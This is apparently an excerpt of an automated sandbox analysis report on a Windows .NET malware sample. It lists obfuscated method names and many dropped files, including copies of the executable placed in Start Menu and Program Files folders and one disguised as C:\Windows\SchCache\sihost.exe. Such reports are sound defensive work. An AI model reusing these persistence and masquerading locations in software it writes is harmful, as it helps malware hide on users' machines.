                            Source: teh76E2k50.exe, JAhYVhxULGC3qM1GO3C.csHigh entropy of concatenated method names: 'Ha3DY1FeMm', 'rdshNqHNPUIkaPv2RmL7', 'EkIZ5PHNTiKSVL3hhVmc', 'CIpVQLHNbTNrJ2Fmycc3', 'eNyGNTHNdMW3HoZarGB1', 'baTfAYHN6mU2HUTw6PHv', 'pA7GgjHN8nfN2a2PmgQK', 'xUvsgpHNmZCDndId7Ghu', 'PJBMTKHNBllGEcyMRx5t', 'LafDujePyB'
                            Source: teh76E2k50.exe, iR2RNhNO2FZgPeF5ceu.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                            Source: teh76E2k50.exe, Y2EJ6WU4VotFcxhgsFe.csHigh entropy of concatenated method names: 'OZFUsCNL6b', 'UQTUwEbvck', 'npkUIsa7dM', 'YX6UaPJBiB', 'FuQU1Y0r5C', 'YfcU9h8lmL', 'DCXUWKNXHt', 'e3MUicBmYd', 'PSTUhniN9O', 'TpPUKi4iEt'
                            Source: teh76E2k50.exe, BugD18dPUj1VKKvinF4.csHigh entropy of concatenated method names: 'cqpdo4GeBl', 'oXYdFKfslD', 'rYbAWrHsPrJqahn2pM0f', 'RY0Di7HsTD6kVx0NrdCX', 'eZps4nHsbHhxSF5LXnp4', 'ENPDQBHsdW6D0F4ObrKy', 'Qmydyqcdie', 'C3LdRUT2yn', 'RyBRuoHsxLKOtl6Piuma', 'uUOD8bHsHqBQJ9fL5p5H'
                            Source: teh76E2k50.exe, TStZEymAEZ3TwvacyFk.csHigh entropy of concatenated method names: 'RHPBcNiiPo', 'xMtnYNH9hebU83gNwHTR', 'KQTaNSH9Kp7d4QX54w53', 'NVbTViH9Xw3AJboTtAhO', 'kR02ynH9tSmkHjxett7g', 'L9imLdro9s', 'k3xmsw5YXr', 'e0HmwRqA6B', 'uaAmIjGFrJ', 'oAima2f3Ja'
                            Source: teh76E2k50.exe, RX8sKIjGNGnKHNbUjpO.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'XZ7jVtGUe2', 'Lg7WPIHqAffvNG4nSFN0', 'yXfcKNHqNouqQFax0nG2', 'AmSAD5HqL8GdYUBEhdNH', 'kBGfI0HqsndjKDj70XTH', 'U8JdYTHqw0dFqS2lidhN', 'PFdWZdHqIETNX0EUoLZe'
                            Source: teh76E2k50.exe, z4FShZDjSA73ivY85cM.csHigh entropy of concatenated method names: 'MyPDULQr5y', 'vinDJIypDy', 'jywDzgb128', 'TQf9tlHN3xoXV4TDbpCN', 'MINEClHNqwXrV4m7ED0Z', 'qV8JYxHNkSt4pmtRS24a', 'Nwcfq8HNQ4dwbKHFpxfV', 'V6cDQCKiBO', 'viLD32Stn1', 'vbZDqnRWtn'
                            Source: teh76E2k50.exe, xWsOXl1RQ9crQPW2Mmt.csHigh entropy of concatenated method names: 'UDC1onIyU7', 'TXF1F1JFul', 'sKB142686O', 'w2N1u7FTvQ', 'iGD1vTJ6cZ', 'y5017Y2cID', 'lRE1G1eBtT', 'Kv71r3soQy', 'ke21ViWe56', 'h6v1lOF95v'
                            Source: teh76E2k50.exe, pyIdpuMz9oASVWVgoUI.csHigh entropy of concatenated method names: 'hbk8da9t4n', 'O7mdgpHaWAmN1JnIgpfD', 'oWhbkwHa1LDNewr9BwoB', 'cEiReEHa9Kp561blBAQm', 'kxOpQ0HaifPBwTIhqegl', 'eq7', 'd65', 'vClHDFx7N0q', 'FttHD4s4lmB', 'E1yHTN2NSNY'
                            Source: teh76E2k50.exe, n2EWPpjNDLeREVHqAQv.csHigh entropy of concatenated method names: 'MecjwCg8PJ', 'QFej9o6hG4', 'rm4jh96yCj', 'N6KjKkleLQ', 'FIXjX7EInB', 'YwqjthoQgR', 'IHtjndvwWo', 'n1dj5mpHj3', '_0023Nn', 'Dispose'
                            Source: teh76E2k50.exe, X43MSOMNWbFiJWS1b0h.csHigh entropy of concatenated method names: 'tthMitmCWm', 'ANL9ILHamZ5Nh44MDgEJ', 'YkeGeYHaMEvH6CP6YGgb', 'hsoDiFHa8d9FFphafo0c', 'dSLDnMHa6MelCIwGdOMj', 'JXBx52HaB7kIt8m3hLFy', 'UU8', 'd65', 'LUJHDC8BGJX', 'FM9HDYGXZ3H'
                            Source: teh76E2k50.exe, UpIFnUDiHQcFVnWEdxJ.csHigh entropy of concatenated method names: 'r7BDprhhs4', 'GesTIfHNX93lpYiE6pUF', 'YTVY9RHNhUEPRKlQf6sk', 'g9flKeHNKcOEX4oni9BI', 'hEcNsyHNtS5T1xp1XFwJ', 'qaZDKiuGqs', 'V5bDX1VjFC', 'wSKDtWpPhl', 'yclIoZHN9Z0ekf7b9eby', 'NvF1xdHNarctR6oFpPCT'
                            Source: teh76E2k50.exe, BNc88AMpWpPEb1lULAU.csHigh entropy of concatenated method names: '_8X5', 'd65', 'ED3HDyhoYxY', 'DUdHDRrvIGi', 'iBTHTejjMqt', 'W8rHDOnOO0B', 'C70UV2HaFvJrDcGwwvAA', 'wqG6lWHa43oY4RE44wVd', 'fZc17XHacjI6sOQDuv97', 's0nbP7HaoQKNy9gg3ntT'
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\uztGBGQb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DUVDVzTj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NGhBOsDn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\njoWmzRS.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\dHXpSOOR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RIKKhLUb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YZpakwNq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eSpQDyfl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DVEbprGR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LBCkjtUW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\bFkGxfJW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RjktmRtH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZYWXQKba.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vVgeAcHF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WqOKhwod.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cITPDfAk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lZLXuWSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jEwQkWoc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cZaiSBtn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jaGPEhSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\QNeKkLxj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\udNLVcin.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pekolobp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\PoAthZqt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lfIQBAUr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\grqSYDFD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZXnzwSps.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\agYrTKhn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vvnfIPHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DqCnHdQh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RxFbjhcG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vqpwvlrw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SdJAbeSN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\roNndSaI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\aVcAAtju.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ApHNCCYS.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\bOHGhRcS.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\Mdbejyft.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FIZLHNPh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZYViKKNQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\HxVaNNSD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hzuPnDnj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sJafoJXg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rAWXeJDJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kbBrEeQW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ntFYeaQw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ukroqyJE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BWJmXZSj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NhIjUycT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DMSuMAAN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XcNSPwyw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\tdyfcXuf.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\PUeIrTzt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\uvTpeyOg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nbyFPFWu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UsorSwnr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OsbzKhHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nOGxuVGL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TeKaTmkD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cehiCBVH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ITPCmwoz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qwtgsSmh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ulxeAMJt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kMzZuVIy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\PrtbrpVP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XUBRajkw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IJUlMoHw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vZGvXkKA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wfzurMmi.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Windows\SchCache\sihost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\DBTJGhcJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NAwlwLuv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\bIzZYPGT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EeGvsrMf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jKExtYKb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qnXVOghu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KGTKXJkx.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\hyNgaLOK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UxTRaQvw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HhaNcSpz.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SEWrteSu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wgyFlLYZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\gtCFacYK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pCKGgjCJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\gXUhixOD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kplGuznc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AWpwsIZS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SvEAvCEH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YvtbMwXu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IQFswXwL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kqZnADfT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jIzxpLYw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zldVQLHr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nxfpBjTr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wnjMVvNo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RZgJomBm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hfuaKQAB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zLWUHZHy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OOHuqLql.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\spJDjPmp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iIfHKufe.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\gajzKhLA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CjKdtCCI.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yimcMvrd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KDDLYXsV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TqUKVeNE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sPQEsCmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RrULRATN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\uMuxXkBA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eoWApcbj.logJump to dropped file
